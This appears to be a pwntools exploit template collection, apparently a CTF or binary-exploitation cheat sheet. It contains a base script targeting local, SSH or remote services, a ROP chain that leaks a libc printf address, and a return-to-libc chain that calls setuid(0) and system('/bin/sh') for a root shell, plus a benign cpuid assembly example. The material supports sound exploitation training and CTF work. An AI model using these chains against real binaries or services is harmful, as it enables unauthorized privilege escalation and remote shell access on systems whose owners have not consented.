Templates

Pwntools Linux Base

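#!/usr/bin/env python3
"""Pwntools base template: pick the target transport from pwntools `args` flags.

    ./exploit.py            local process
    ./exploit.py GDB        local process under gdb (pwndbg)
    ./exploit.py SSH        run the binary inside a shell on an SSH host
    ./exploit.py REMOTE     connect to service_host:service_port

Fill in `target` and whichever of the service / SSH settings you use.
"""
import os

from pwn import *

# Terminal that gdb.debug() uses to open the debugger window.
context.terminal = ['alacritty', '-e', 'zsh', '-c']

# Path to the target binary (for SSH: the path on the remote host).
target = ''

# Parse the ELF once; binding it to the context sets arch/bits/endianness
# for asm(), ROP(), p64() etc.
binary = ELF(target)
context.binary = binary

# Network service, used with REMOTE.
service_host = ""
service_port = 0

# SSH endpoint, used with SSH. Do not leave a real password in the script:
# it is read from the SSH_PASS environment variable (prefer keyfile= if you can).
ssh_host = ''
ssh_user = ''
ssh_pass = os.environ.get('SSH_PASS', '')
ssh_port = 22

if args['GDB']:
    # gdbscript: load pwndbg, then run until the target blocks on input.
    # Put breakpoints before the 'continue' line.
    p = gdb.debug(target, '''
source /home/xct/tools/pwndbg/gdbinit.py
continue
''')
elif args['SSH']:
    sh = ssh(host=ssh_host, user=ssh_user, password=ssh_pass, port=ssh_port)
    p = sh.run('/bin/bash')
    p.recv(4096, timeout=2)   # drain the shell banner / prompt
    p.sendline(target)        # start the target inside the remote shell
elif args['REMOTE']:
    p = remote(service_host, service_port)
else:
    # setuid=True keeps pwntools from setting PR_SET_NO_NEW_PRIVS on the child,
    # so a setuid target keeps its privileges when run locally.
    p = process(target, setuid=True, level='DEBUG')

buf = b""

# Use bytes for tube I/O; pwntools 4.x warns on str arguments.
p.recvuntil(b"")   # fill in the prompt to sync on
p.sendline(buf)
p.interactive()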

Leak and jump back

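# Stage 1: leak a libc pointer, then restart the binary for a second stage.
# Assumes a non-PIE binary (ROP(binary) emits the ELF's static addresses) and
# that 100 bytes of padding reach the saved return address.
rop = ROP(binary)
# printf(GOT[printf]): the GOT entry itself is used as the *format string*, so
# its contents (the resolved libc printf address, little-endian, up to the
# first NUL byte) are echoed back verbatim. No "%s" argument is needed.
rop.call(binary.plt["printf"], [binary.got["printf"]])
# Return into _start so the program runs again and we can send stage 2.
rop.call(binary.symbols['_start'])
log.info(rop.dump())

buf = b"A" * 100 + rop.chain()
p.sendline(buf)

# A canonical user-space address has at most 6 significant bytes, so pad to 8
# before unpacking. If the program prints anything before the leak, consume
# that prefix first, otherwise u64() sees more than 8 bytes and raises.
out = p.recvline().strip(b"\n")
out = u64(out.ljust(8, b"\x00"))
log.info(f"leaked printf@libc: {out:#x}")
# Next step (libc = ELF('<libc used by the target>')):
#   libc.address = out - libc.symbols['printf']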

Spawn Shell

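# Stage 2: return-to-libc shell. Requires libc = ELF(<libc path>) with
# libc.address set from the stage-1 leak; otherwise ROP(libc) and
# libc.search() hand out unrelocated addresses.
rop = ROP(libc)
# Named binsh rather than sh so it does not clobber the ssh() handle `sh`
# that the base template creates in SSH mode.
binsh = next(libc.search(b"/bin/sh\x00"))
# setuid(0) first: on a setuid-root target, sh/bash drop the effective uid
# back to the real uid unless the two match.
rop.call(libc.symbols['setuid'], [0])
# On amd64, system() can crash on a 16-byte misaligned stack (movaps inside
# do_system). If that happens, prepend a plain `ret` gadget before this call:
#   rop.raw(rop.find_gadget(['ret'])[0])
rop.call(libc.symbols['system'], [binsh])
log.info(rop.dump())

# Same padding as stage 1: it must reach the saved return address.
buf = b"A" * 100 + rop.chain()
p.sendline(buf)
p.interactive()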

Compile Shellcode with Pwntools

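"""Assemble a tiny amd64 program with pwntools and write it out as an ELF."""
import os

from pwn import *

context.arch = 'amd64'

# pwntools runs the source through cpp before assembling, so // comments work.
code = """
// cpuid leaf 0; result is left in eax/ebx/ecx/edx and not printed
mov rax, 0x00
cpuid
// exit(0)
mov rdi, 0x00
mov rax, 60
syscall
"""

# extract=True returns the ELF image as bytes instead of a path to a temp file.
elf = make_elf_from_assembly(code, extract=True)  # shared=1: build a shared object instead

out_path = 'cpuid'
with open(out_path, 'wb') as f:
    f.write(elf)
# open() creates the file without the execute bit; set it so the ELF can be run directly.
os.chmod(out_path, 0o755)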